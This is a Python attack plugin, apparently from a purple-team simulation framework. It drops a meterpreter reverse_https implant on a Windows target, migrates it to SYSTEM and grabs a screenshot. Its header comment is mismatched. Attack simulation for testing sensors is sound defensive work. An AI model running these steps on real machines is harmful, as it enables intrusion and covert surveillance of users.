mirror of https://github.com/avast/PurpleDome
You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
46 lines
1.3 KiB
Python
46 lines
1.3 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# A plugin to nmap targets slow motion, to evade sensors
|
|
|
|
from plugins.base.attack import AttackPlugin, Requirement
|
|
|
|
|
|
class MetasploitScreengrabPlugin(AttackPlugin):
|
|
|
|
# Boilerplate
|
|
name = "metasploit_screengrab"
|
|
description = "Grab a screenshot"
|
|
ttp = "T1055"
|
|
references = ["https://attack.mitre.org/techniques/T1055/"]
|
|
|
|
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
|
|
|
|
requirements = [Requirement.METASPLOIT]
|
|
|
|
def __init__(self):
|
|
super().__init__()
|
|
self.plugin_path = __file__
|
|
|
|
def run(self, targets):
|
|
""" Run the command
|
|
|
|
@param targets: A list of targets, ip addresses will do
|
|
"""
|
|
|
|
res = ""
|
|
payload_type = "windows/x64/meterpreter/reverse_https"
|
|
payload_name = "babymetal.exe"
|
|
target = self.targets[0]
|
|
|
|
self.metasploit.smart_infect(target,
|
|
payload=payload_type,
|
|
outfile=payload_name,
|
|
format="exe",
|
|
architecture="x64")
|
|
|
|
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
|
|
|
|
self.metasploit.screengrab(target)
|
|
|
|
return res
|